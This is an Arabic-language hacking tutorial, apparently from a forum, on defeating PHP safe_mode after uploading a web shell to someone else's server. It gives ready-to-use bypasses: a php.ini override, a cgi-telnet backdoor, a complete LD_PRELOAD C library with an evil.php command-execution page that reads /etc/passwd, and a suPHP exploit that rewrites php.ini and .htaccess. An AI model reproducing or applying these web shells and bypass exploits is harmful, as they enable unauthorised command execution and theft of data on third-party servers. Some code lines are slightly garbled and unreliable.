الوضع الأمن Safe_mode - وتجميع لطرق تخطيه

[cold]

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته ...

نتكلم عن الأن جزئيه مهمة ومنحنى أخر في أختراق السيرفرات والمواقع الوضع الأمن الذي سبب عقده لي أغلب المخترقين ... طبع من خلال دروسنا اللي سبقت شفتوا الشلات على سيرفرات حمايته صفر

سطر الأوامور موجود وكل شيء مريح


لكن تخيل يوم ترفع الشل وتحصل معلومات السيرفر كما في الصوره





كيف نعرف اذا كنا نستخدم الـ phpshell ان السيرفر سيف مود ؟؟

راح تجد أن سطر إدخال الأوامر أختفى وأن حالة السيف مود on والشل أحيان يطلع لك معوق من المود سكيورتي مانعك من تشغيل أغلب مميزات الشل

نجي الحين نعرف لكم عدة مصطلحات ونوضح لك كل شيء

ماهو السيف مود (Safe Mode)؟

هي حماية موجودة داخل مترجم الـ php وعند تفعيله يمنعك من فعل اشياء كثيرة بسبب تعطيل دوال الـ php التي تسبب خطر على السيرفر

توضيح اكثر
هي عبارة عن منع اسكربتات الـ php من استدعاء دوال النظام بمعنى آخر هو حجب لبعض الدوال الخطرة مثل الدالة sytem ( ) و ....و shell_exec و popen( )و exec( ) و Pass thru ( )
فمثلا حتى تستخدم الأمر cat يجب أن تكون دالة الـ system() مفعلة حتى تستطيع تطبيق الأمر بشكل صحيح ومن غيرها لن تجد أي استجابة من السير فر ...

لماذا تختفي خانة تنفيذ الأوامر في الشل عندما يكون السيف مود مفعل؟
مثل ماذكرنا أن عند تفعيل السيف مود تتعطل الدوال الخطيرة على السيرفر الموجوده في لغة البرمجه php والتي في الغالب يكون ملف التجسس مبرمج بواسطتها
وسبب أختفاء سطر الأوامر هو تعطيل الدوال التي يمكن تنفيذ الأوامر من خلالها مثل (system , shell_exec , exec) وغيرها
مع العلم أن بإمكان مدير السيرفر إضافة المزيد من الدوال لتعطيلها وأي دالة تعطل يصير مالها مفعول ولا تأدي وظيفتها في السيرفر
وفي هذي الحالة تزيد حماية السيرفر ويصعب عليك تنفيذ الأوامر وجمع المعلومات.

نجي نشوف طريقة تفعيل المود سكيورتي في السيرفرات

استعراض ملف php. ini وسنجد أن حالة السيف مود غير مفعلة مسبقاً safe_mode = off
ولتفعيلها فما علينا إلا وضع التالي :-
Safe – mode = on
ثم نقوم بعمل ريستارت للاباتشي بالأمر
httpd restart


طبعا وش دخلنا بطريقة تشغيل و نحن نبي نتخطى حبيت أوريكم طريقة الحماية عند عكسها تسمى تخطي ومن أشهر الطرق في التخطى كانت برفع ملف php.ini مكتوب فيه الأتي

كود:
safe_mode = Off disable_functions = safe_mode_gid = Off open_basedir = Off register_globals = on
نقوم برفعه على السيرفر وإستعراضه من المتصفح كالتالي

كود:
www.sniper.com/php.ini
وراح يعطيك رسالة بنفس المكتوب داخل المجلد
وعند الرجوع إلى السيرفر تجد أن حالة السيف مود تحولت من on إلى of

والملف جاهز مرفق مع الموضوع

ملاحظات على هذه الطريقة :

1- تستخدم في حالة صلايحة اليوزر فقط . وكذلك تفعيل التعديل من قبل مالك السيرفر على ملف php.ini

2- عند عمل الطريقة يجب رفع الملف php.ini في ملف غير المتواجد فيه الشل لان احيانا يغلق لك الملف من قبل السيرفر واحيانا تؤدي لغلق المساحه كامله كنوع من الحمايه

--------------------------------


نعلم جميعا أن تخطي السيف مود والمود سكيورتي الهدف منه هو تطبيق كوماند على السيرفر ومن أشهر الطرق وأفضلها لتخطي السيف مود هي إستخدام سكربتات بيرل - cgi

طيب نتعرف الأن عليه وطريقة تشغيله والتعامل معه

**ماهو cgi-telnet

هو عبارة عن سكربت مبرمج بلغة البيرل يمكنك من استدعاء الدوال على السيرفر , وتنفيذ اوامر

اللينكس على السيرفر , بشكل عام الفائده منه تشغيل هذا السكربت التخطي وتنفيذ أوامر على السيرفر ومن ناحية شخصيه افضله بشكل أكبر على شل PHP

طريقة التعامل مع سكربت cgi-telnt وتشغيله على السيرفر

ملاحظة / سوف أقو بشرح طريقة التشغيل والتطبيق بشكل مبسط من خلال السي بنل ,, وراح نتطرق لي عدة طرق الدرس القادم بيكون فقط لي طرق التخطي

أولا: نقوم برفع السكربت على السيرفر في المسار الأتي

كود:
/ home / xxxx / public_html / cgi-bin / cgi.pl
كمثال راح اشغله عن طريق السي بنل


ندخل من السي بنل

بعد الدخول الى مجلد public_html نقوم بدخول الى مجلد cgi-bin

بعد دخول المجلد نقوم برفع السكربت

بعد رفع السكربت نقوم بأعطاه التصريح 755 لكي يعمل


بعد إعطاه التصريح نذهب لي إستعراضه من المتصفح من الرابط الآتي

كود:
www.xxxxx.com/cgi-bin/cgi.pl
نشوف الأن شاشة الدخول وطبعا السكربت مزود بباسورد لي الدخول

بعد الدخول نطبق أوامر وأنت ماخذ راحتك وفيه جميع الخيارات لديك

----------------


حيث سنتناول في هذه الدرس طرق التخطي المتعارف عليها عند الهكر وراح اقوم شملها ووضعها لكم في موضوع حتى تكون مرجع لكل .

وأحب أوضح معلومه بسيطه

أغلاق السيف مود وتحويله من on إلى of يعتبر أفضل تخطي ,وتنفيذ الأوامر كذلك يعتبر تخطي كلهما مكمل لي بعضهما وسوف أبداء

بوضع عدة طرق لكم ,, والهدف من ذلك وجود عدة خيارات حسب حماية السيرفر فبعض السيرفرات , تعمل عليها جميع الطرق وبعضها

لاتعمل عليها ,, ومع تراكم الخبرات لديك سوف تنتجون لنا طرق تخطي بأذن الله .

- طرق تخطي السيف مود Safe_mode :

1- تخطي السيف مود بداله proc_open


رابط الثغره التي تسمح لك بالتخطي:

[]

الثغره تعمل عن طريق تطبق اوامر عن طريق دالة proc_open وتخطي الحمايه وتنفيذ الأوامر من خلالها

-من شروط عمل هذه الطريقة :

لابد أن تكون الدالة proc_open مفعلة في السيرفر وغير محضوره

-طريقة التخطي وعمل الثغره:

أولا: نقوم بعمل ملف أسمه a.c

بداخله على الكود التالي :

كود:
#include <stdlib.h> #include <stdio.h> #include <string.h> int getuid() { char *en; char *buf=malloc(300); FILE *a; unsetenv("LD_PRELOAD"); a=fopen(".comm","r"); buf=fgets(buf,100,a); write(2,buf,strlen(buf)); fclose(a); rename("a.so","b.so"); system(buf); system("mv output.txt .comm1"); rename("b.so","a.so"); free(buf); return 0; }
الكود مكتوب بلغة c++

ثانيا : نقوم بترجمة الملف من خلال الأمر الأتي :-

كود:
cc -o a.so - fPIC - shared a.c
ثالثا : نجي لي كود evi l.php وطريقة تعديله:

حيث نجد داخله هذا الكود

كود PHP:

<?php

$path="/var/www"; //change to your writable path


$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("file", $path."/output.txt","w"),
2 => array("file", $path."/errors.txt", "a" )
);

$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed


sleep(1);
$a=fopen($path."/.comm1","r");

echo "<pre><b>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";

?>

الأن بعد تجهيز ملفات الثغره مطلوب منك الأتي :-

1- نقوم بأنشاء مجلد مثلا بأسم sniper
2- نقوم برفع الملفين a.c و evil.php داخله
3- نقوم بأعطاء مجلد sniper وملف evil.php تصريح 777 كلاهما
4- نقوم بعد ذلك بفتح ملف evil.php وإستبدال المسار التالي الموجود داخله

كود:
$path="/var/www";
بالمسار الذي قمت برفع الملفات عليه كالتالي :-

كود:
$ path =" /home/xxxxxx/public_html/sniper / ";
بعد ذلك نذهب لي استعراض من المتصفح الملف وتخطي السيف مود كالتالي :-

كود:
alm3erfh.com/sniper/evil.php?c=Command
اي بدل كلمة Command ضع الأمر الذي ترغب بتنفيذه وتحديث الصفحة .

مثال :

كود:
alm3erfh.com/sniper/evil.php?c=cat/etc/passwd
طبعا ملفات الثغره جاهزة مترمجه مرفقه مع الموضوع بمجلد أسمه proc_open


================================================== ===================================

.:: تخطي الوضع الامن بجميع إصدارات php والاباتشي في حالة suphp ::.

رابط الثغره : -

[]

بعد الأطلاع على الثغره نأتي لطريقة إستثمارها وتخطي الحماية : -

راح نحتاج ثلاث ملفات لعمل الثغره ,, ويفضل عمل ملف جديد على المساحة اللي تعمل عليها لرفع ملفات الثغره :-

الملفات وطريقة تعديلها :-

أولا: نأخذ كود الثغره ونحفظه في ملف php وكمثال بنسميه test.php وبيكون فيه هذا الكود :-
كود PHP:

<?

/*

apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit

Author : Mr.SaFa7

Home : v4-team.com

note : this exploit for education

*/

echo "[+] Start...\n";

$bypfile=fopen('php.ini','w+');

$stuffile=fopen('.htaccess','w+');

if($bypfile and $stuffile!= NULL){

echo "[+] evil files created succes ! \n";

}

else{

echo "[-] access denial ! \n";

}

$byprullz1="safe_mode = OFF

";

$byprullz2="disable_functions = NONE";

$dj=fwrite($bypfile,$byprullz1);

$dj1=fwrite($bypfile,$byprullz2);

fclose($bypfile);

if($dj and $dj1!= NULL){

echo "[+] php.ini writed \n";

}

else{

echo "[-] 404 php.ini not found !\n";

}

$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path

$sf7=fwrite($stuffile,$breakrullz);

fclose($stuffile);

if($sf7!= NULL){

echo "[+] evil .htaccess writed\n";

echo "[+] exploited by success!\n\n\n";

echo "\t\t\t[+] discouvred by Mr.SaFa7\n";

echo "\t\t\t[+] home : v4-team.com\n";

echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n";

}

else{

echo "[-] evil .htaccess Not found!\n";

}

system("pwd;ls -lia;uname -a;cat /etc/passwd");

#EOF

?>

بعد ذلك بنستخدم ملف php.ini المعروف سابقا ولكن لن تستطيع التخطئ إلى الأن تابع معي
كود:
safe_mode = OFF disable_functions = NONE

بعدل ذلك نجي لي أهم ملف اللي هو الهتاكسس يحتوي على الكود التالي :-

كود:
suPHP_ConfigPath /home/user/public_html/php.ini
الآن عرفنا ملفات الثغره :-

ولابد من قبل رفع الملفات نعدل على ملفين هما test.php الخاص بالثغره وملف الهتاكسس وذلك بوضع مسارك للمجلد الذي قمت بعمله على المساحه لرفع ملفات الثغره :-

ولتسهيل العملية سوف نفرض أن مسار علمنا هو

كود:
/home/user/public_html/snip3r/php.ini
حيث نقوم بتغير المسارات في ملف tset.php في السطر التالي :-

كود:
$ path ="$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini";

وكذلك ملف الهتاكسس : -

كود:
suPHP_ConfigPath /home/user/public_html/php.ini

بوضع مسارنا الذي نعمل عليه والذي نريد بتطبيق الاستثمار فيه :-

بعد ذلك نقوم برفع الملفات الثلاثه وزيادة معاهم ترفع شلك اللي راح تشوف نتيجة التخطي فيه :-

الان تروح تستعرض ملف الثغرة test.php من المتصفح حسب مسارك

xxxxxxxxxxx.com/snip3r/test.php

بعد ذلك نذهب ونستعرض الشل سوف تجد أنه تم تخطي السيف مود وحجب الدوال واصبحت الحمايه تساوي صفر

================================================== ===================================